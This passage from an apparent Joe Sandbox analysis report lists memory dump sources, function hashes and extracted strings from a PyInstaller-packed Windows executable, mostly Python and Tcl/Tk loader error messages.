                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3215553584-0
                                                                    • Opcode ID: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
                                                                    • Instruction ID: 9e81972da620e93cf06c24240699a13e6a951021f9021bdf6eacebbba11872ba
                                                                    • Opcode Fuzzy Hash: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
                                                                    • Instruction Fuzzy Hash: 8F01C462A2874141EA04DF56990106DB6A5BF85FE8F185B34DEACA7BD6EE3EF0018700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3215553584-0
                                                                    • Opcode ID: f73c62597e7360775599b130af8d7787deaeebf14f296c678ba137edcd315959
                                                                    • Instruction ID: 34da477f968d67adb1d544e8e995f0c280e37c1aed1eec64640b827dff9c40a1
                                                                    • Opcode Fuzzy Hash: f73c62597e7360775599b130af8d7787deaeebf14f296c678ba137edcd315959
                                                                    • Instruction Fuzzy Hash: 31018022E2D642C0FA646F61A94927D6190AF8479CF146F38EA9DD26C7FF3EFC414200
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF67D01BAA6,?,?,?,00007FF67D01AC67,?,?,00000000,00007FF67D01AF02), ref: 00007FF67D01F2AD
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: ad72610c1691118a78623675ffb4602911f8d1a0a6f53dbf3f5690a0bb35320a
                                                                    • Instruction ID: df0ac6a1e171e5de8069a61c8b8ee49f12452666d78c213083f694a1749f3fc6
                                                                    • Opcode Fuzzy Hash: ad72610c1691118a78623675ffb4602911f8d1a0a6f53dbf3f5690a0bb35320a
                                                                    • Instruction Fuzzy Hash: 02F06D2BB2960645FE549FA194113BD2A915F89B88F4C6E30CE0EC63D1FE2EF4818620
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(?,?,?,00007FF67D010E24,?,?,?,00007FF67D012336,?,?,?,?,?,00007FF67D013929), ref: 00007FF67D01DCFA
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 7e0b1927fbdc3a6ed72285cdcbe6a9dc307cd073e663e3b2fd931ce122d4be7c
                                                                    • Instruction ID: a29d7345a80eb8eb3c419fd772a605ff7889b461c895951308bf8e825645c5ae
                                                                    • Opcode Fuzzy Hash: 7e0b1927fbdc3a6ed72285cdcbe6a9dc307cd073e663e3b2fd931ce122d4be7c
                                                                    • Instruction Fuzzy Hash: DDF05E02F2924751FE549EA1980067912905F887A8F0C2F30E82ECA2C1FE2EF4408620
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3215553584-0
                                                                    • Opcode ID: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
                                                                    • Instruction ID: 34fcb5fb3c1e7a08e103629ac7e154e19daf02d537a2ef4c78a6b2914f642605
                                                                    • Opcode Fuzzy Hash: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
                                                                    • Instruction Fuzzy Hash: C7E08C62E28302C2FB147EA2098A6BD21114F84308F402E38DA488A2C3FE1EBC458620
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryErrorLastRemove
                                                                    • String ID:
                                                                    • API String ID: 377330604-0
                                                                    • Opcode ID: bdc813d071ebcfd580e26e39c2a5fdf0ab8f113e1ff0d9792b57e541ecf83804
                                                                    • Instruction ID: fcebc1a8c47299016a46725df138c907698c22368085fabd81058aac84609ad5
                                                                    • Opcode Fuzzy Hash: bdc813d071ebcfd580e26e39c2a5fdf0ab8f113e1ff0d9792b57e541ecf83804
                                                                    • Instruction Fuzzy Hash: 2E414217D3CA8591EA51AF2495112FD6360FBA9784F54AB32DB8D82293FF28B5D88300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc
                                                                    • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                    • API String ID: 190572456-2208601799
                                                                    • Opcode ID: 08011e4291223f8c8b87355f84bdba84e3d11561fc99f88d49761070ad3606f6
                                                                    • Instruction ID: 862d8f9c26cf99cde077d20ac54873f0e1b5492a9afa74cd5e979e3182459948
                                                                    • Opcode Fuzzy Hash: 08011e4291223f8c8b87355f84bdba84e3d11561fc99f88d49761070ad3606f6
                                                                    • Instruction Fuzzy Hash: D8E1FD67A3EB03A1FA15CF15E85417427A6AF08788B987F36C84D863A4FF7CB5488354
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                    • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                    • API String ID: 2446303242-1601438679
                                                                    • Opcode ID: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
                                                                    • Instruction ID: 1efbe85863ff93af371fc9539ed9730ea28383d49905062ab18b486acbfdeaf3
                                                                    • Opcode Fuzzy Hash: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
                                                                    • Instruction Fuzzy Hash: 59A17937228B8196E314CF21E48479AB760F788B88F505A25DB9D43B28DF7DF164CB40
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 3140674995-0
                                                                    • Opcode ID: be1c9f70274c1bfa0c57ec5397cb0351ad5ab78a1ed88338b70abc701b0ce300
                                                                    • Instruction ID: 8bb624092c382a0b018689f41f9fa2c72f2043c96b9165500569b760bcba053e
                                                                    • Opcode Fuzzy Hash: be1c9f70274c1bfa0c57ec5397cb0351ad5ab78a1ed88338b70abc701b0ce300
                                                                    • Instruction Fuzzy Hash: 5D317373629B8195EB60CF60E8403ED3360FB44748F44553ADA4D87B98EF38E648C714
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 1239891234-0
                                                                    • Opcode ID: 008726ea591ffa8193f39527e8fee48c852db3d8167e5981d4ed2afc12fe266b
                                                                    • Instruction ID: 2a6cad11aaccbc802450e4b49aa14a261d5ab5d7e5f3c3bb3de0c92d23ffadd9
                                                                    • Opcode Fuzzy Hash: 008726ea591ffa8193f39527e8fee48c852db3d8167e5981d4ed2afc12fe266b
                                                                    • Instruction Fuzzy Hash: 32316237628B8195DB60CF25E8402AE77A0FB88798F541635EE9D83B58EF3CE555CB00
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 2227656907-0
                                                                    • Opcode ID: 99e62b62205f6f1247891fef44c3d84ab051c8482e1ee44e82008766d3ad9720
                                                                    • Instruction ID: 9751544c2446eba7def6964b0f0e0fb4a0a01e72925b24fee63a3764d5715969
                                                                    • Opcode Fuzzy Hash: 99e62b62205f6f1247891fef44c3d84ab051c8482e1ee44e82008766d3ad9720
                                                                    • Instruction Fuzzy Hash: B5B1B423B2A68241EA61DFB194046BD6361EB54BE8F446A31EE5D87B85FF3DF445C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc
                                                                    • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                    • API String ID: 190572456-4266016200
                                                                    • Opcode ID: f2f88704c5d1e061734efcee993fe9c6dd7b1185595c7391647c05c7e9d36fbf
                                                                    • Instruction ID: 0f170cf70c364640a8fa905e2f69953b6488a265c0aef5c53f5df6495324e904
                                                                    • Opcode Fuzzy Hash: f2f88704c5d1e061734efcee993fe9c6dd7b1185595c7391647c05c7e9d36fbf
                                                                    • Instruction Fuzzy Hash: 8912A866E7EF03A0FA15CF14E85417827A1AF59798B947F35C80E863A4FF7CB5488248
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: Message_fread_nolock
                                                                    • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                                    • API String ID: 3065259568-2316137593
                                                                    • Opcode ID: 7191306b36fa9629016ec528b0469e11664432b189d4a2fa2b9f0e5a0646db98
                                                                    • Instruction ID: 3ce6229853dc5b31e03b546bbc9b06720e97241bae2a5350b64b6d373b4380ea
                                                                    • Opcode Fuzzy Hash: 7191306b36fa9629016ec528b0469e11664432b189d4a2fa2b9f0e5a0646db98
                                                                    • Instruction Fuzzy Hash: 1151B423A3968355EA20EF21A4502FE6394EF447C8F506A31EE4DC7A99FE7CF5458300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                    • String ID: P%
                                                                    • API String ID: 2147705588-2959514604
                                                                    • Opcode ID: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                                    • Instruction ID: 5eea4158ab6933db2320d26fb0adb0c4922ca02ccd3b16e246a43bf03560e693
                                                                    • Opcode Fuzzy Hash: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                                    • Instruction Fuzzy Hash: 5251F9266247A186D634DF36E0581BAB7A1FB98B65F004225EFCE83644EF3CF045D710
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,00007FF67D002A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF67D00101D), ref: 00007FF67D008597
                                                                    • FormatMessageW.KERNEL32 ref: 00007FF67D0085C6
                                                                    • WideCharToMultiByte.KERNEL32 ref: 00007FF67D00861C
                                                                      • Part of subcall function 00007FF67D0029E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF67D0088F2,?,?,?,?,?,?,?,?,?,?,?,00007FF67D00101D), ref: 00007FF67D002A14
                                                                      • Part of subcall function 00007FF67D0029E0: MessageBoxW.USER32 ref: 00007FF67D002AF0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                    • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                    • API String ID: 2920928814-2573406579
                                                                    • Opcode ID: f8b909e9681ff6aa95198e912ee695dc1f7db9a724790c30e57e4941c2966439
                                                                    • Instruction ID: cf95dee0e8ca745476810e2344fb80e0e1eead2190d848008b4feba337fb01fe
                                                                    • Opcode Fuzzy Hash: f8b909e9681ff6aa95198e912ee695dc1f7db9a724790c30e57e4941c2966439
                                                                    • Instruction Fuzzy Hash: A3217133A38A4292EB60DF21E8402796365FF88388F942A35D54DC26A4FF3CF545C750
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: -$:$f$p$p
                                                                    • API String ID: 3215553584-2013873522
                                                                    • Opcode ID: 17c3eaeb34264a701bb66d7ce4ab8a897af2982fe98c3a48157bd34433a5c608
                                                                    • Instruction ID: ef900c19b8d892b35e97bce11e61bcf7ca681576abd7507371b39ed75f628966
